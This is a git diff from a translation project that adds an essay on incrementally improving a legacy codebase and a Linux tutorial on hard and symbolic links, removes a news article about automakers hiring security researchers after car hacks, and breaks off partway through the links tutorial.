-[1]:http://www.linkedin.com/shareArticle?mini=true&url=http://dockr.ly/2k6gnOB&title=Introducing%20Docker%20Secrets%20Management&summary=Containers%20are%20changing%20how%20we%20view%20apps%20and%20infrastructure.%20Whether%20the%20code%20inside%20containers%20is%20big%20or%20small,%20container%20architecture%20introduces%20a%20change%20to%20how%20that%20code%20behaves%20with%20hardware%20-%20it%20fundamentally%20abstracts%20it%20from%20the%20infrastructure.%20Docker%20believes%20that%20there%20are%20three%20key%20components%20to%20container%20security%20and%20... -[2]:http://www.reddit.com/submit?url=http://dockr.ly/2k6gnOB&title=Introducing%20Docker%20Secrets%20Management -[3]:https://plus.google.com/share?url=http://dockr.ly/2k6gnOB -[4]:http://news.ycombinator.com/submitlink?u=http://dockr.ly/2k6gnOB&t=Introducing%20Docker%20Secrets%20Management -[5]:https://twitter.com/share?text=Get+safer+apps+for+dev+and+ops+w%2F+new+%23Docker+secrets+management+&via=docker&related=docker&url=http://dockr.ly/2k6gnOB -[6]:https://twitter.com/share?text=Get+safer+apps+for+dev+and+ops+w%2F+new+%23Docker+secrets+management+&via=docker&related=docker&url=http://dockr.ly/2k6gnOB -[7]:http://dockr.ly/AppSecurity -[8]:https://www.docker.com/getdocker -[9]:http://www.docker.com/trial -[10]:https://docs.docker.com/engine/swarm/secrets/ -[11]:http://www.docker.com/webinars -[12]:https://blog.docker.com/author/yingli/ -[13]:https://blog.docker.com/tag/container-security/ -[14]:https://blog.docker.com/tag/docker-security/ -[15]:https://blog.docker.com/tag/secrets-management/ -[16]:https://blog.docker.com/tag/security/ -[17]:https://docs.docker.com/engine/swarm/how-swarm-mode-works/pki/ -[18]:https://docs.docker.com/engine/swarm/secrets/ -[19]:https://lvh.io%29/ diff --git a/sources/tech/20170530 How to Improve a Legacy Codebase.md b/sources/tech/20170530 How to Improve a Legacy Codebase.md new file mode 100644 index 0000000000..cff5e70538 --- /dev/null +++ b/sources/tech/20170530 How to Improve a Legacy Codebase.md @@ -0,0 +1,108 @@ +Translating by aiwhj +# How to Improve a Legacy Codebase + + +It happens at least once in the lifetime of every programmer, project manager or teamleader. You get handed a steaming pile of manure, if you’re lucky only a few million lines worth, the original programmers have long ago left for sunnier places and the documentation - if there is any to begin with - is hopelessly out of sync with what is presently keeping the company afloat. + +Your job: get us out of this mess. + +After your first instinctive response (run for the hills) has passed you start on the project knowing full well that the eyes of the company senior leadership are on you. Failure is not an option. And yet, by the looks of what you’ve been given failure is very much in the cards. So what to do? + +I’ve been (un)fortunate enough to be in this situation several times and me and a small band of friends have found that it is a lucrative business to be able to take these steaming piles of misery and to turn them into healthy maintainable projects. Here are some of the tricks that we employ: + +### Backup + +Before you start to do anything at all make a backup of  _everything_  that might be relevant. This to make sure that no information is lost that might be of crucial importance somewhere down the line. All it takes is a silly question that you can’t answer to eat up a day or more once the change has been made. Especially configuration data is susceptible to this kind of problem, it is usually not versioned and you’re lucky if it is taken along in the periodic back-up scheme. So better safe than sorry, copy everything to a very safe place and never ever touch that unless it is in read-only mode. + +### Important pre-requisite, make sure you have a build process and that it actually produces what runs in production + +I totally missed this step on the assumption that it is obvious and likely already in place but many HN commenters pointed this out and they are absolutely right: step one is to make sure that you know what is running in production right now and that means that you need to be able to build a version of the software that is - if your platform works that way - byte-for-byte identical with the current production build. If you can’t find a way to achieve this then likely you will be in for some unpleasant surprises once you commit something to production. Make sure you test this to the best of your ability to make sure that you have all the pieces in place and then, after you’ve gained sufficient confidence that it will work move it to production. Be prepared to switch back immediately to whatever was running before and make sure that you log everything and anything that might come in handy during the - inevitable - post mortem. + +### Freeze the DB + +If at all possible freeze the database schema until you are done with the first level of improvements, by the time you have a solid understanding of the codebase and the legacy code has been fully left behind you are ready to modify the database schema. Change it any earlier than that and you may have a real problem on your hand, now you’ve lost the ability to run an old and a new codebase side-by-side with the database as the steady foundation to build on. Keeping the DB totally unchanged allows you to compare the effect your new business logic code has compared to the old business logic code, if it all works as advertised there should be no differences. + +### Write your tests + +Before you make any changes at all write as many end-to-end and integration tests as you can. Make sure these tests produce the right output and test any and all assumptions that you can come up with about how you  _think_  the old stuff works (be prepared for surprises here). These tests will have two important functions: they will help to clear up any misconceptions at a very early stage and they will function as guardrails once you start writing new code to replace old code. + +Automate all your testing, if you’re already experienced with CI then use it and make sure your tests run fast enough to run the full set of tests after every commit. + +### Instrumentation and logging + +If the old platform is still available for development add instrumentation. Do this in a completely new database table, add a simple counter for every event that you can think of and add a single function to increment these counters based on the name of the event. That way you can implement a time-stamped event log with a few extra lines of code and you’ll get a good idea of how many events of one kind lead to events of another kind. One example: User opens app, User closes app. If two events should result in some back-end calls those two counters should over the long term remain at a constant difference, the difference is the number of apps currently open. If you see many more app opens than app closes you know there has to be a way in which apps end (for instance a crash). For each and every event you’ll find there is some kind of relationship to other events, usually you will strive for constant relationships unless there is an obvious error somewhere in the system. You’ll aim to reduce those counters that indicate errors and you’ll aim to maximize counters further down in the chain to the level indicated by the counters at the beginning. (For instance: customers attempting to pay should result in an equal number of actual payments received). + +This very simple trick turns every backend application into a bookkeeping system of sorts and just like with a real bookkeeping system the numbers have to match, as long as they don’t you have a problem somewhere. + +This system will over time become invaluable in establishing the health of the system and will be a great companion next to the source code control system revision log where you can determine the point in time that a bug was introduced and what the effect was on the various counters. + +I usually keep these counters at a 5 minute resolution (so 12 buckets for an hour), but if you have an application that generates fewer or more events then you might decide to change the interval at which new buckets are created. All counters share the same database table and so each counter is simply a column in that table. + +### Change only one thing at the time + +Do not fall into the trap of improving both the maintainability of the code or the platform it runs on at the same time as adding new features or fixing bugs. This will cause you huge headaches because you now have to ask yourself every step of the way what the desired outcome is of an action and will invalidate some of the tests you made earlier. + +### Platform changes + +If you’ve decided to migrate the application to another platform then do this first  _but keep everything else exactly the same_ . If you want you can add more documentation or tests, but no more than that, all business logic and interdependencies should remain as before. + +### Architecture changes + +The next thing to tackle is to change the architecture of the application (if desired). At this point in time you are free to change the higher level structure of the code, usually by reducing the number of horizontal links between modules, and thus reducing the scope of the code active during any one interaction with the end-user. If the old code was monolithic in nature now would be a good time to make it more modular, break up large functions into smaller ones but leave names of variables and data-structures as they were. + +HN user [mannykannot][1] points - rightfully - out that this is not always an option, if you’re particularly unlucky then you may have to dig in deep in order to be able to make any architecture changes. I agree with that and I should have included it here so hence this little update. What I would further like to add is if you do both do high level changes and low level changes at least try to limit them to one file or worst case one subsystem so that you limit the scope of your changes as much as possible. Otherwise you might have a very hard time debugging the change you just made. + +### Low level refactoring + +By now you should have a very good understanding of what each module does and you are ready for the real work: refactoring the code to improve maintainability and to make the code ready for new functionality. This will likely be the part of the project that consumes the most time, document as you go, do not make changes to a module until you have thoroughly documented it and feel you understand it. Feel free to rename variables and functions as well as datastructures to improve clarity and consistency, add tests (also unit tests, if the situation warrants them). + +### Fix bugs + +Now you’re ready to take on actual end-user visible changes, the first order of battle will be the long list of bugs that have accumulated over the years in the ticket queue. As usual, first confirm the problem still exists, write a test to that effect and then fix the bug, your CI and the end-to-end tests written should keep you safe from any mistakes you make due to a lack of understanding or some peripheral issue. + +### Database Upgrade + +If required after all this is done and you are on a solid and maintainable codebase again you have the option to change the database schema or to replace the database with a different make/model altogether if that is what you had planned to do. All the work you’ve done up to this point will help to assist you in making that change in a responsible manner without any surprises, you can completely test the new DB with the new code and all the tests in place to make sure your migration goes off without a hitch. + +### Execute on the roadmap + +Congratulations, you are out of the woods and are now ready to implement new functionality. + +### Do not ever even attempt a big-bang rewrite + +A big-bang rewrite is the kind of project that is pretty much guaranteed to fail. For one, you are in uncharted territory to begin with so how would you even know what to build, for another, you are pushing  _all_  the problems to the very last day, the day just before you go ‘live’ with your new system. And that’s when you’ll fail, miserably. Business logic assumptions will turn out to be faulty, suddenly you’ll gain insight into why that old system did certain things the way it did and in general you’ll end up realizing that the guys that put the old system together weren’t maybe idiots after all. If you really do want to wreck the company (and your own reputation to boot) by all means, do a big-bang rewrite, but if you’re smart about it this is not even on the table as an option. + +### So, the alternative, work incrementally + +To untangle one of these hairballs the quickest path to safety is to take any element of the code that you do understand (it could be a peripheral bit, but it might also be some core module) and try to incrementally improve it still within the old context. If the old build tools are no longer available you will have to use some tricks (see below) but at least try to leave as much of what is known to work alive while you start with your changes. That way as the codebase improves so does your understanding of what it actually does. A typical commit should be at most a couple of lines. + +### Release! + +Every change along the way gets released into production, even if the changes are not end-user visible it is important to make the smallest possible steps because as long as you lack understanding of the system there is a fair chance that only the production environment will tell you there is a problem. If that problem arises right after you make a small change you will gain several advantages: + +* it will probably be trivial to figure out what went wrong + +* you will be in an excellent position to improve the process + +* and you should immediately update the documentation to show the new insights gained + +### Use proxies to your advantage + +If you are doing web development praise the gods and insert a proxy between the end-users and the old system. Now you have per-url control over which requests go to the old system and which you will re-route to the new system allowing much easier and more granular control over what is run and who gets to see it. If your proxy is clever enough you could probably use it to send a percentage of the traffic to the new system for an individual URL until you are satisfied that things work the way they should. If your integration tests also connect to this interface it is even better. + +### Yes, but all this will take too much time! + +Well, that depends on how you look at it. It’s true there is a bit of re-work involved in following these steps. But it  _does_  work, and any kind of optimization of this process makes the assumption that you know more about the system than you probably do. I’ve got a reputation to maintain and I  _really_  do not like negative surprises during work like this. With some luck the company is already on the skids, or maybe there is a real danger of messing things up for the customers. In a situation like that I prefer total control and an iron clad process over saving a couple of days or weeks if that imperils a good outcome. If you’re more into cowboy stuff - and your bosses agree - then maybe it would be acceptable to take more risk, but most companies would rather take the slightly slower but much more sure road to victory. + +-------------------------------------------------------------------------------- + +via: https://jacquesmattheij.com/improving-a-legacy-codebase + +作者:[Jacques Mattheij ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://jacquesmattheij.com/ +[1]:https://news.ycombinator.com/item?id=14445661 diff --git a/sources/tech/20170607 Why Car Companies Are Hiring Computer Security Experts.md b/sources/tech/20170607 Why Car Companies Are Hiring Computer Security Experts.md deleted file mode 100644 index 4a7d23e5f0..0000000000 --- a/sources/tech/20170607 Why Car Companies Are Hiring Computer Security Experts.md +++ /dev/null @@ -1,91 +0,0 @@ -Why Car Companies Are Hiring Computer Security Experts -============================================================ - -Photo -![](https://static01.nyt.com/images/2017/06/08/business/08BITS-GURUS1/08BITS-GURUS1-superJumbo.jpg) -The cybersecurity experts Marc Rogers, left, of CloudFlare and Kevin Mahaffey of Lookout were able to control various Tesla functions from their physically connected laptop. They pose in CloudFlare’s lobby in front of Lava Lamps used to generate numbers for encryption.CreditChristie Hemm Klok for The New York Times - -It started about seven years ago. Iran’s top nuclear scientists were being assassinated in a string of similar attacks: Assailants on motorcycles were pulling up to their moving cars, attaching magnetic bombs and detonating them after the motorcyclists had fled the scene. - -In another seven years, security experts warn, assassins won’t need motorcycles or magnetic bombs. All they’ll need is a laptop and code to send driverless cars careering off a bridge, colliding with a driverless truck or coming to an unexpected stop in the middle of fast-moving traffic. - -Automakers may call them self-driving cars. But hackers call them computers that travel over 100 miles an hour. - -“These are no longer cars,” said Marc Rogers, the principal security researcher at the cybersecurity firm CloudFlare. “These are data centers on wheels. Any part of the car that talks to the outside world is a potential inroad for attackers.” - -Those fears came into focus two years ago when two “white hat” hackers — researchers who look for computer vulnerabilities to spot problems and fix them, rather than to commit a crime or cause problems — successfully gained access to a Jeep Cherokee from their computer miles away. They rendered their crash-test dummy (in this case a nervous reporter) powerless over his vehicle and disabling his transmission in the middle of a highway. - -The hackers, Chris Valasek and Charlie Miller (now security researchers respectively at Uber and Didi, an Uber competitor in China), discovered an [electronic route from the Jeep’s entertainment system to its dashboard][10]. From there, they had control of the vehicle’s steering, brakes and transmission — everything they needed to paralyze their crash test dummy in the middle of a highway. - -“Car hacking makes great headlines, but remember: No one has ever had their car hacked by a bad guy,” Mr. Miller wrote on Twitter last Sunday. “It’s only ever been performed by researchers.” - -Still, the research by Mr. Miller and Mr. Valasek came at a steep price for Jeep’s manufacturer, Fiat Chrysler, which was forced to recall 1.4 million of its vehicles as a result of the hacking experiment. - -It is no wonder that Mary Barra, the chief executive of General Motors, called cybersecurity her company’s top priority last year. Now the skills of researchers and so-called white hat hackers are in high demand among automakers and tech companies pushing ahead with driverless car projects. - -Uber, [Tesla][11], Apple and Didi in China have been actively recruiting white hat hackers like Mr. Miller and Mr. Valasek from one another as well as from traditional cybersecurity firms and academia. - -Last year, Tesla poached Aaron Sigel, Apple’s manager of security for its iOS operating system. Uber poached Chris Gates, formerly a white hat hacker at Facebook. Didi poached Mr. Miller from Uber, where he had gone to work after the Jeep hack. And security firms have seen dozens of engineers leave their ranks for autonomous-car projects. - -Mr. Miller said he left Uber for Didi, in part, because his new Chinese employer has given him more freedom to discuss his work. - -“Carmakers seem to be taking the threat of cyberattack more seriously, but I’d still like to see more transparency from them,” Mr. Miller wrote on Twitter on Saturday. - -Like a number of big tech companies, Tesla and Fiat Chrysler started paying out rewards to hackers who turn over flaws the hackers discover in their systems. GM has done something similar, though critics say GM’s program is limited when compared with the ones offered by tech companies, and so far no rewards have been paid out. - -One year after the Jeep hack by Mr. Miller and Mr. Valasek, they demonstrated all the other ways they could mess with a Jeep driver, including hijacking the vehicle’s cruise control, swerving the steering wheel 180 degrees or slamming on the parking brake in high-speed traffic — all from a computer in the back of the car. (Those exploits ended with their test Jeep in a ditch and calls to a local tow company.) - -Granted, they had to be in the Jeep to make all that happen. But it was evidence of what is possible. - -The Jeep penetration was preceded by a [2011 hack by security researchers at the University of Washington][12] and the University of California, San Diego, who were the first to remotely hack a sedan and ultimately control its brakes via Bluetooth. The researchers warned car companies that the more connected cars become, the more likely they are to get hacked. - -Security researchers have also had their way with Tesla’s software-heavy Model S car. In 2015, Mr. Rogers, together with Kevin Mahaffey, the chief technology officer of the cybersecurity company Lookout, found a way to control various Tesla functions from their physically connected laptop. - -One year later, a team of Chinese researchers at Tencent took their research a step further, hacking a moving Tesla Model S and controlling its brakes from 12 miles away. Unlike Chrysler, Tesla was able to dispatch a remote patch to fix the security holes that made the hacks possible. - -In all the cases, the car hacks were the work of well meaning, white hat security researchers. But the lesson for all automakers was clear. - -The motivations to hack vehicles are limitless. When it learned of Mr. Rogers’s and Mr. Mahaffey’s investigation into Tesla’s Model S, a Chinese app-maker asked Mr. Rogers if he would be interested in sharing, or possibly selling, his discovery, he said. (The app maker was looking for a backdoor to secretly install its app on Tesla’s dashboard.) - -Criminals have not yet shown they have found back doors into connected vehicles, though for years, they have been actively developing, trading and deploying tools that can intercept car key communications. - -But as more driverless and semiautonomous cars hit the open roads, they will become a more worthy target. Security experts warn that driverless cars present a far more complex, intriguing and vulnerable “attack surface” for hackers. Each new “connected” car feature introduces greater complexity, and with complexity inevitably comes vulnerability. - -Twenty years ago, cars had, on average, one million lines of code. The General Motors 2010 [Chevrolet Volt][13] had about 10 million lines of code — more than an [F-35 fighter jet][14]. - -Today, an average car has more than 100 million lines of code. Automakers predict it won’t be long before they have 200 million. When you stop to consider that, on average, there are 15 to 50 defects per 1,000 lines of software code, the potentially exploitable weaknesses add up quickly. - -The only difference between computer code and driverless car code is that, “Unlike data center enterprise security — where the biggest threat is loss of data — in automotive security, it’s loss of life,” said David Barzilai, a co-founder of Karamba Security, an Israeli start-up that is working on addressing automotive security. - -To truly secure autonomous vehicles, security experts say, automakers will have to address the inevitable vulnerabilities that pop up in new sensors and car computers, address inherent vulnerabilities in the base car itself and, perhaps most challenging of all, bridge the cultural divide between automakers and software companies. - -“The genie is out of the bottle, and to solve this problem will require a major cultural shift,” said Mr. Mahaffey of the cybersecurity company Lookout. “And an automaker that truly values cybersecurity will treat security vulnerabilities the same they would an airbag recall. We have not seen that industrywide shift yet.” - -There will be winners and losers, Mr. Mahaffey added: “Automakers that transform themselves into software companies will win. Others will get left behind.” - --------------------------------------------------------------------------------- - -via: https://www.nytimes.com/2017/06/07/technology/why-car-companies-are-hiring-computer-security-experts.html - -作者:[NICOLE PERLROTH ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://www.nytimes.com/by/nicole-perlroth -[1]:https://www.nytimes.com/2016/06/09/technology/software-as-weaponry-in-a-computer-connected-world.html -[2]:https://www.nytimes.com/2015/08/29/technology/uber-hires-two-engineers-who-showed-cars-could-be-hacked.html -[3]:https://www.nytimes.com/2015/08/11/opinion/zeynep-tufekci-why-smart-objects-may-be-a-dumb-idea.html -[4]:https://www.nytimes.com/by/nicole-perlroth -[5]:https://www.nytimes.com/column/bits -[6]:https://www.nytimes.com/2017/06/07/technology/why-car-companies-are-hiring-computer-security-experts.html?utm_source=wanqu.co&utm_campaign=Wanqu+Daily&utm_medium=website#story-continues-1 -[7]:http://www.nytimes.com/newsletters/sample/bits?pgtype=subscriptionspage&version=business&contentId=TU&eventName=sample&module=newsletter-sign-up -[8]:https://www.nytimes.com/privacy -[9]:https://www.nytimes.com/help/index.html -[10]:https://bits.blogs.nytimes.com/2015/07/21/security-researchers-find-a-way-to-hack-cars/ -[11]:http://www.nytimes.com/topic/company/tesla-motors-inc?inline=nyt-org -[12]:http://www.autosec.org/pubs/cars-usenixsec2011.pdf -[13]:http://autos.nytimes.com/2011/Chevrolet/Volt/238/4117/329463/researchOverview.aspx?inline=nyt-classifier -[14]:http://topics.nytimes.com/top/reference/timestopics/subjects/m/military_aircraft/f35_airplane/index.html?inline=nyt-classifier -[15]:https://www.nytimes.com/2017/06/07/technology/why-car-companies-are-hiring-computer-security-experts.html?utm_source=wanqu.co&utm_campaign=Wanqu+Daily&utm_medium=website#story-continues-3 diff --git a/sources/tech/20170622 A users guide to links in the Linux filesystem.md b/sources/tech/20170622 A users guide to links in the Linux filesystem.md new file mode 100644 index 0000000000..3cb59aaacb --- /dev/null +++ b/sources/tech/20170622 A users guide to links in the Linux filesystem.md @@ -0,0 +1,314 @@ +Translating by yongshouzhang + + +A user's guide to links in the Linux filesystem +============================================================ + +### Learn how to use links, which make tasks easier by providing access to files from multiple locations in the Linux filesystem directory tree. + + +![A user's guide to links in the Linux filesystem](https://opensource.com/sites/default/files/styles/image-full-size/public/images/life/links.png?itok=AumNmse7 "A user's guide to links in the Linux filesystem") +Image by : [Paul Lewin][8]. Modified by Opensource.com. [CC BY-SA 2.0][9] + +In articles I have written about various aspects of Linux filesystems for Opensource.com, including [An introduction to Linux's EXT4 filesystem][10]; [Managing devices in Linux][11]; [An introduction to Linux filesystems][12]; and [A Linux user's guide to Logical Volume Management][13], I have briefly mentioned an interesting feature of Linux filesystems that can make some tasks easier by providing access to files from multiple locations in the filesystem directory tree. + +There are two types of Linux filesystem links: hard and soft. The difference between the two types of links is significant, but both types are used to solve similar problems. They both provide multiple directory entries (or references) to a single file, but they do it quite differently. Links are powerful and add flexibility to Linux filesystems because [everything is a file][14]. + +More Linux resources + +* [What is Linux?][1] + +* [What are Linux containers?][2] + +* [Download Now: Linux commands cheat sheet][3] + +* [Advanced Linux commands cheat sheet][4] + +* [Our latest Linux articles][5] + +I have found, for instance, that some programs required a particular version of a library. When a library upgrade replaced the old version, the program would crash with an error specifying the name of the old, now-missing library. Usually, the only change in the library name was the version number. Acting on a hunch, I simply added a link to the new library but named the link after the old library name. I tried the program again and it worked perfectly. And, okay, the program was a game, and everyone knows the lengths that gamers will go to in order to keep their games running. + +In fact, almost all applications are linked to libraries using a generic name with only a major version number in the link name, while the link points to the actual library file that also has a minor version number. In other instances, required files have been moved from one directory to another to comply with the Linux file specification, and there are links in the old directories for backwards compatibility with those programs that have not yet caught up with the new locations. If you do a long listing of the **/lib64** directory, you can find many examples of both. + +``` +lrwxrwxrwx. 1 root root 36 Dec 8 2016 cracklib_dict.hwm -> ../../usr/share/cracklib/pw_dict.hwm +lrwxrwxrwx. 1 root root 36 Dec 8 2016 cracklib_dict.pwd -> ../../usr/share/cracklib/pw_dict.pwd +lrwxrwxrwx. 1 root root 36 Dec 8 2016 cracklib_dict.pwi -> ../../usr/share/cracklib/pw_dict.pwi +lrwxrwxrwx. 1 root root 27 Jun 9 2016 libaccountsservice.so.0 -> libaccountsservice.so.0.0.0 +-rwxr-xr-x. 1 root root 288456 Jun 9 2016 libaccountsservice.so.0.0.0 +lrwxrwxrwx 1 root root 15 May 17 11:47 libacl.so.1 -> libacl.so.1.1.0 +-rwxr-xr-x 1 root root 36472 May 17 11:47 libacl.so.1.1.0 +lrwxrwxrwx. 1 root root 15 Feb 4 2016 libaio.so.1 -> libaio.so.1.0.1 +-rwxr-xr-x. 1 root root 6224 Feb 4 2016 libaio.so.1.0.0 +-rwxr-xr-x. 1 root root 6224 Feb 4 2016 libaio.so.1.0.1 +lrwxrwxrwx. 1 root root 30 Jan 16 16:39 libakonadi-calendar.so.4 -> libakonadi-calendar.so.4.14.26 +-rwxr-xr-x. 1 root root 816160 Jan 16 16:39 libakonadi-calendar.so.4.14.26 +lrwxrwxrwx. 1 root root 29 Jan 16 16:39 libakonadi-contact.so.4 -> libakonadi-contact.so.4.14.26 +``` + +A few of the links in the **/lib64** directory + +The long listing of the **/lib64** directory above shows that the first character in the filemode is the letter "l," which means that each is a soft or symbolic link. + +### Hard links + +In [An introduction to Linux's EXT4 filesystem][15], I discussed the fact that each file has one inode that contains information about that file, including the location of the data belonging to that file. [Figure 2][16] in that article shows a single directory entry that points to the inode. Every file must have at least one directory entry that points to the inode that describes the file. The directory entry is a hard link, thus every file has at least one hard link. + +In Figure 1 below, multiple directory entries point to a single inode. These are all hard links. I have abbreviated the locations of three of the directory entries using the tilde (**~**) convention for the home directory, so that **~** is equivalent to **/home/user** in this example. Note that the fourth directory entry is in a completely different directory, **/home/shared**, which might be a location for sharing files between users of the computer. + +![fig1directory_entries.png](https://opensource.com/sites/default/files/images/life/fig1directory_entries.png) +Figure 1 + +Hard links are limited to files contained within a single filesystem. "Filesystem" is used here in the sense of a partition or logical volume (LV) that is mounted on a specified mount point, in this case **/home**. This is because inode numbers are unique only within each filesystem, and a different filesystem, for example, **/var**or **/opt**, will have inodes with the same number as the inode for our file. + +Because all the hard links point to the single inode that contains the metadata about the file, all of these attributes are part of the file, such as ownerships, permissions, and the total number of hard links to the inode, and cannot be different for each hard link. It is one file with one set of attributes. The only attribute that can be different is the file name, which is not contained in the inode. Hard links to a single **file/inode** located in the same directory must have different names, due to the fact that there can be no duplicate file names within a single directory. + +The number of hard links for a file is displayed with the **ls -l** command. If you want to display the actual inode numbers, the command **ls -li** does that. + +### Symbolic (soft) links + +The difference between a hard link and a soft link, also known as a symbolic link (or symlink), is that, while hard links point directly to the inode belonging to the file, soft links point to a directory entry, i.e., one of the hard links. Because soft links point to a hard link for the file and not the inode, they are not dependent upon the inode number and can work across filesystems, spanning partitions and LVs. + +The downside to this is: If the hard link to which the symlink points is deleted or renamed, the symlink is broken. The symlink is still there, but it points to a hard link that no longer exists. Fortunately, the **ls** command highlights broken links with flashing white text on a red background in a long listing. + +### Lab project: experimenting with links + +I think the easiest way to understand the use of and differences between hard and soft links is with a lab project that you can do. This project should be done in an empty directory as a  _non-root user_ . I created the **~/temp** directory for this project, and you should, too. It creates a safe place to do the project and provides a new, empty directory to work in so that only files associated with this project will be located there. + +### **Initial setup** + +First, create the temporary directory in which you will perform the tasks needed for this project. Ensure that the present working directory (PWD) is your home directory, then enter the following command. + +``` +mkdir temp +``` + +Change into **~/temp** to make it the PWD with this command. + +``` +cd temp +``` + +To get started, we need to create a file we can link to. The following command does that and provides some content as well. + +``` +du -h > main.file.txt +``` + +Use the **ls -l** long list to verify that the file was created correctly. It should look similar to my results. Note that the file size is only 7 bytes, but yours may vary by a byte or two. + +``` +[dboth@david temp]$ ls -l +total 4 +-rw-rw-r-- 1 dboth dboth 7 Jun 13 07:34 main.file.txt +``` + +Notice the number "1" following the file mode in the listing. That number represents the number of hard links that exist for the file. For now, it should be 1 because we have not created any additional links to our test file. + +### **Experimenting with hard links** + +Hard links create a new directory entry pointing to the same inode, so when hard links are added to a file, you will see the number of links increase. Ensure that the PWD is still **~/temp**. Create a hard link to the file **main.file.txt**, then do another long list of the directory. + +``` +[dboth@david temp]$ ln main.file.txt link1.file.txt +[dboth@david temp]$ ls -l +total 8 +-rw-rw-r-- 2 dboth dboth 7 Jun 13 07:34 link1.file.txt +-rw-rw-r-- 2 dboth dboth 7 Jun 13 07:34 main.file.txt +``` + +Notice that both files have two links and are exactly the same size. The date stamp is also the same. This is really one file with one inode and two links, i.e., directory entries to it. Create a second hard link to this file and list the directory contents. You can create the link to either of the existing ones: **link1.file.txt** or **main.file.txt**. + +``` +[dboth@david temp]$ ln link1.file.txt link2.file.txt ; ls -l +total 16 +-rw-rw-r-- 3 dboth dboth 7 Jun 13 07:34 link1.file.txt +-rw-rw-r-- 3 dboth dboth 7 Jun 13 07:34 link2.file.txt +-rw-rw-r-- 3 dboth dboth 7 Jun 13 07:34 main.file.txt +``` + +Notice that each new hard link in this directory must have a different name because two files—really directory entries—cannot have the same name within the same directory. Try to create another link with a target name the same as one of the existing ones. + +``` +[dboth@david temp]$ ln main.file.txt link2.file.txt +ln: failed to create hard link 'link2.file.txt': File exists +``` + +Clearly that does not work, because **link2.file.txt** already exists. So far, we have created only hard links in the same directory. So, create a link in your home directory, the parent of the temp directory in which we have been working so far. + +``` +[dboth@david temp]$ ln main.file.txt ../main.file.txt ; ls -l ../main* +-rw-rw-r-- 4 dboth dboth 7 Jun 13 07:34 main.file.txt +``` + +The **ls** command in the above listing shows that the **main.file.txt** file does exist in the home directory with the same name as the file in the temp directory. Of course, these are not different files; they are the same file with multiple links—directory entries—to the same inode. To help illustrate the next point, add a file that is not a link. + +``` +[dboth@david temp]$ touch unlinked.file ; ls -l +total 12 +-rw-rw-r-- 4 dboth dboth 7 Jun 13 07:34 link1.file.txt +-rw-rw-r-- 4 dboth dboth 7 Jun 13 07:34 link2.file.txt +-rw-rw-r-- 4 dboth dboth 7 Jun 13 07:34 main.file.txt +-rw-rw-r-- 1 dboth dboth 0 Jun 14 08:18 unlinked.file +``` + +Look at the inode number of the hard links and that of the new file using the **-i**option to the **ls** command. + +``` +[dboth@david temp]$ ls -li +total 12 +657024 -rw-rw-r-- 4 dboth dboth 7 Jun 13 07:34 link1.file.txt +657024 -rw-rw-r-- 4 dboth dboth 7 Jun 13 07:34 link2.file.txt +657024 -rw-rw-r-- 4 dboth dboth 7 Jun 13 07:34 main.file.txt +657863 -rw-rw-r-- 1 dboth dboth 0 Jun 14 08:18 unlinked.file +``` + +Notice the number **657024** to the left of the file mode in the example above. That is the inode number, and all three file links point to the same inode. You can use the **-i** option to view the inode number for the link we created in the home directory as well, and that will also show the same value. The inode number of the file that has only one link is different from the others. Note that the inode numbers will be different on your system. + +Let's change the size of one of the hard-linked files. + +``` +[dboth@david temp]$ df -h > link2.file.txt ; ls -li +total 12 +657024 -rw-rw-r-- 4 dboth dboth 1157 Jun 14 14:14 link1.file.txt +657024 -rw-rw-r-- 4 dboth dboth 1157 Jun 14 14:14 link2.file.txt +657024 -rw-rw-r-- 4 dboth dboth 1157 Jun 14 14:14 main.file.txt +657863 -rw-rw-r-- 1 dboth dboth 0 Jun 14 08:18 unlinked.file +``` + +The file size of all the hard-linked files is now larger than before. That is because there is really only one file that is linked to by multiple directory entries. + +I know this next experiment will work on my computer because my **/tmp**directory is on a separate LV. If you have a separate LV or a filesystem on a different partition (if you're not using LVs), determine whether or not you have access to that LV or partition. If you don't, you can try to insert a USB memory stick and mount it. If one of those options works for you, you can do this experiment. + +Try to create a link to one of the files in your **~/temp** directory in **/tmp** (or wherever your different filesystem directory is located). + +``` +[dboth@david temp]$ ln link2.file.txt /tmp/link3.file.txt +ln: failed to create hard link '/tmp/link3.file.txt' => 'link2.file.txt': +Invalid cross-device link +``` + +Why does this error occur? The reason is each separate mountable filesystem has its own set of inode numbers. Simply referring to a file by an inode number across the entire Linux directory structure can result in confusion because the same inode number can exist in each mounted filesystem. + +There may be a time when you will want to locate all the hard links that belong to a single inode. You can find the inode number using the **ls -li** command. Then you can use the **find** command to locate all links with that inode number. + +``` +[dboth@david temp]$ find . -inum 657024 +./main.file.txt +./link1.file.txt +./link2.file.txt +``` + +Note that the **find** command did not find all four of the hard links to this inode because we started at the current directory of **~/temp**. The **find** command only finds files in the PWD and its subdirectories. To find all the links, we can use the following command, which specifies your home directory as the starting place for the search. + +``` +[dboth@david temp]$ find ~ -samefile main.file.txt +/home/dboth/temp/main.file.txt +/home/dboth/temp/link1.file.txt +/home/dboth/temp/link2.file.txt +/home/dboth/main.file.txt +``` + +You may see error messages if you do not have permissions as a non-root user. This command also uses the **-samefile** option instead of specifying the inode number. This works the same as using the inode number and can be easier if you know the name of one of the hard links. + +### **Experimenting with soft links** + +As you have just seen, creating hard links is not possible across filesystem boundaries; that is, from a filesystem on one LV or partition to a filesystem on another. Soft links are a means to answer that problem with hard links. Although they can accomplish the same end, they are very different, and knowing these differences is important. + +Let's start by creating a symlink in our **~/temp** directory to start our exploration. + +``` +[dboth@david temp]$ ln -s link2.file.txt link3.file.txt ; ls -li +total 12 +657024 -rw-rw-r-- 4 dboth dboth 1157 Jun 14 14:14 link1.file.txt +657024 -rw-rw-r-- 4 dboth dboth 1157 Jun 14 14:14 link2.file.txt +658270 lrwxrwxrwx 1 dboth dboth 14 Jun 14 15:21 link3.file.txt -> +link2.file.txt +657024 -rw-rw-r-- 4 dboth dboth 1157 Jun 14 14:14 main.file.txt +657863 -rw-rw-r-- 1 dboth dboth 0 Jun 14 08:18 unlinked.file +``` + +The hard links, those that have the inode number **657024**, are unchanged, and the number of hard links shown for each has not changed. The newly created symlink has a different 